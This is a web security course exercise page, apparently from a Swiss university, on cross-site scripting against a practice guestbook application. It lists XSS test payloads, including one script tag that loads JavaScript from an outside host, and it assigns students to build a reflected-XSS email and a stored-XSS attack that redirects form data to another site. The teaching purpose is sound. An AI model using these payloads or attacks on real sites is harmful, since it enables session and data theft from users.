AWT: Web Security - Cross Site Scripting

In order to do this exercise, you first need to install the guestbook example application. Download and install guestbook.

Try the following inputs in your search for Guestbook (these examples come from the site ha.ckers.org/xss.html):

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Write an HTML e-mail containing a reflected XSS link to your guestbook that changes the text of the title (the <h1 id='title'> one).

Write a Stored-XSS attack (means add a new line in your guestbook that contains this attack) that changes the action of your search form and sends the information to another site that redirects finally to the right page (quite similar to the example for the login in the xss examples page).

Hack another corrupted application

Try the same technics on your own homework application. Test if it is secure from the point of view of XSS.

Contact

Prof. Dr. Emmanuel Benoist
Berner Fachhochschule - TI
Quellgasse 21
CH-2501 Biel/Bienne
Switzerland
Mail: emmanuel.benoist (at) bfh.ch

Social Networks

Follow me on
Linkedin, Scholar & Research gate

http://www.ti.bfh.ch/

AWT: Web Security - Cross Site Scripting

Hack another corrupted application

Related Pages

Contact

Social Networks